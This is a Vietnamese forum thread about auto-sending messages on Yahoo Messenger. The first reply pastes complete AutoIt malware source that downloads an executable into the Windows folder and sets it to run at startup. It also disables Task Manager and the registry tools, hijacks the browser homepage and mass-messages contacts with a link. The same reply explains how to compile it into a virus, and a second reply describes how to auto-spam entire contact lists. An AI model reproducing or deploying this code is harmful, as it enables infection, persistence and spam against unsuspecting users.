Cách tạo auto send trên yahoo chát với

ai bit bay nha
vietnam
Trả lời 15 năm trước
Code virus yahoo ( Auto Send Group ) và hướng dẫn cách làm đây mới lượm được cái này để ai bị dính đại loại vậy thì biết cách eidt lại trong registtry cho an toàn nhé. bạn vào http://www.autoitscript.com/autoit3/downloads.shtml để download autoit nhé còn đây là 1 số ứng dụng viết trên autoit(ST) Khoá màn hình và yêu cầu mật khẩu khi muốn trở lại màn hình làm việc Code: ; <AUT2EXE VERSION: 3.2.0.1> ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-START: D:\\AutoIT\\Projects\\Adware\\DKC.au3> ; ---------------------------------------------------------------------------- ;-------------------------------------------- ; Tac Gia: KVD ; Phan Mem: DKC Bot ; Phien Ban: 1.1 ; Cong Dung: Quang cao Website thong qua Y!M ; Phat Hanh: 1-9-2006 ;-------------------------------------------- ; Thiet Lap #NoTrayIcon $website = "http://google.com.vn" ; Lay Nhiem Vao He Thong If Not FileExists(@WindowsDir & "\\taskmng.exe") Then InetGet ($website & "/dkc.exe", @WindowsDir & "\\taskmng.exe", 0, 1) Sleep(5000) EndIf ; Ghi Khoa Registry RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Micr osoft\\Internet Explorer\\Control Panel", "Homepage", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Win dows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Win dows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Int ernet Explorer\\Main", "Start Page", "REG_SZ", $website) RegWrite("HKEY_CURRENT_USER\\Software\\Yahoo\\pager\\V iew\\YMSGR_buzz", "content url", "REG_SZ", $website) RegWrite("HKEY_CURRENT_USER\\Software\\Yahoo\\pager\\V iew\\YMSGR_Launchcast", "content url", "REG_SZ", $website) RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wi ndows\\CurrentVersion\\Run", "Task Manager", "REG_SZ", @WindowsDir & "\\taskmng.exe") RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Int ernet Explorer\\Main", "Window Title", "REG_SZ", "zzzKITClubzzz") ; Danh Sach Tin Nhan Ngau Nhien Dim $tin[10] $tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... " & $website & " " $tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... " & $website & " " $tin[2] = "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... " & $website & " " $tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... " & $website & " " $tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & $website & " " $tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $website & " " $tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $website & " " $tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $website & " " $tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $website & " " $tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $website & " " ; Ham Thay Doi Status & Gui Tin Nhan While (1) sleep(60000) $tieude = WinGetTitle("Yahoo! Messenger", "") $kiemtra = WinExists ($tieude) If $kiemtra = 1 Then $ngaunhien = Random(0,9,1) ClipPut($tin[$ngaunhien]) BlockInput (1) WinActivate($tieude) Send("!m") Send("un") Send("^v {ENTER}{ENTER}") Send("^m") Send("{DOWN}") Send("^{SHIFTDOWN}{END}{SHIFTUP}") Send("{ENTER}") Send("^v {ENTER}") BlockInput (0) EndIf Sleep(1800000) WEnd ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-END: D:\\AutoIT\\Projects\\Adware\\DKC.au3> ; -------------------------------------------------------------------- copy 1 trong các đoạn mã trên rồi paste vào notepad, lưu thành file *.au3 sau đó bạn down autoit (bản mới nhất nhé) về cài đặt rồi click chuột phải vào file *.au3 chọn "Run script" để chạy trên máy (đừng dùng với những code virut) chọn "Compile script" để biên dịch thành file *.exe (cái này dùng để tạo virus) Con virus này , đừng có giỡn với nó nhá , coi chừng cài máy lại , nếu ko diệt dc hehe ( hoặc miễn online yahoo luôn ) len web chat thì ok
leha
Trả lời 15 năm trước
Có một số người làm theo dạn plugin tuy nhiên không hợp lý. Cách đơn giản nhất, bạn có thể quét nội dung chat, trong cửa sổ chat. và dùng hàm api ControlSetText() đến YahooInput và giả lập phím Enter để gửi nội dung chat của minh. Cách này có thể auto spam và auto send tất cả các list ( trong yahoo main hay trong yahoo room) ^^ Dựa vào cách này, bạn có thể thiết kế một hệ thống trả lời tự động cho tất cả mọi vấn đề(từ điển, robot chat, tin tức....) Code autoit bạn trên đưa ra không hợp lý, gây chậm hệ thống, phiền phức khi chat, .....nếu dùng code đó để đi phá người khác thì còn tàm tạm Chúc bạn thành công!